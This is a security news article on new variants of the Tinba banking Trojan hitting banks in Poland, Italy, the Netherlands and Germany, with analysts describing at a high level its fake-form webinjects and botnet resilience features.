Tiny Tinba malware gets tough, new variants infect European banks
Tiny Tinba malware gets tough, new variants infect European banks

Writing on the company's Security Intelligence blog earlier today, product and risk management expert Ori Bach gave an overview of how the ‘tiny banker' malware, which was first discovered in 2012 when it was the smallest Trojan in circulation with a file size of just 20kB, has been spreading ever since its source code was publicly leaked in July 2011.

He says that gangs have subsequently been able to rework and tweak the ready-made malicious code at no extra cost, while citing the firm's own evidence last September that there were ‘several' campaigns launching Tinba attacks around the globe. These variations, says Bach, sported “significant improvements to the original code.”

Eight months on, and IBM Security Trusteer researchers have gone onto discover a new Tinba infection campaign targeting Poland, Italy, the Netherlands and Germany. Nearly half of recognised incidents were focused on Poland (45 percent), with Italy a distant second (21 percent). Websense confirmed Poland as the number one infected country in an email to SC.

The number of UK incidents is unknown, although one source said the malware would likely to be targeting banks in the City. Towards the end of last year, Avast researchers found that a variant was infecting US and global banks, including Bank of America, JP Morgan Chase, HSBC and ING, via the Rig Exploit Kit.

After infection, Tinba comes into action when the user tried to log into one of the targeted banks. The malware's webinjects are launched, and victims may see fake messages and web forms asking for log-in credentials, personal information or permission to transfer funds. The notice may even attempt to convince users that money has been added to their account accidentally, and thus must be refunded to the bank immediately.

However, creators of the latest variant, wary perhaps of law enforcement takedowns and hijacking, also incorporate new fall-back mechanisms to make sure the botnet remains intact. Safeguards include public key signing – so bot commands and updates only come from authorised botmaster, bots authenticating the updating server before accepting a new configuration, a "machine-dependent encryption layer" for each bot to prevent security researchers from spoofing bots, bots communicating with hard-coded resource URLs and fall-back to DGA-made URLs when necessary.

As well as this additional resilience, and increased size (commentators now say new variants are up to 200kB in file size), the malware also sees the threat actors change focus away from US banks, and towards European banks. 

“Cyber-criminals such as the Dyre gang have been able to overcome language barriers and adapt their tactics to attack local banks," reads the IBM Trusteer blog post. While this trend may prove a challenge to many banks who have not yet hardened their defences, it also provides an opportunity for those institutions to take advantage of the lessons learned having combated this malware elsewhere.”

Bach later told SCMagazineUK.com: "We see attackers constantly evolving their attack techniques to ensure their success. They go where the money is and where they can be successful. In this campaign, fraudsters must adapt the malware for the countries they're targeting. This includes modifying it for language specificity, adapting its inner workings for local banking security measures, adding a mobile component to steal SMS authentication, and more. "

Chris Boyd, malware intelligence analyst at Malwarebytes, said in an email to SC:

“Tinba combines a light footprint with advanced techniques - protection against others taking control of the bot network works equally as well against scammers trying to swipe profits as it does researchers trying to shut a network down. Additionally, the fraudulent "you have overpaid" messages are right out of the spear phishing playbook, and likely to fool most people viewing it.

“We hear so much about banking threats in relation to Brazil and the US that European-centric attacks tend to get glossed over - this is a timely reminder that no bank customer is 100 percent safe from the possibility of being targeted. It's an indicator of the fact that criminals continue to learn from the commercial world, which has figured out that localisation is a good way of convincing people to download and click on things.”

Marco Morana, managing director of Minded Security UK, and SVP of risk and controls for Citi Bank London, said in conversation with SC earlier that security teams shouldn't be chasing new malware families. “Rather we should approach this on a risk-based approach, based on threat modelling,” he said.

He said this attack was proof that the actors behind Tinba are “not just going after consumers, but commercial banks too. They're going after the big money for fraud.”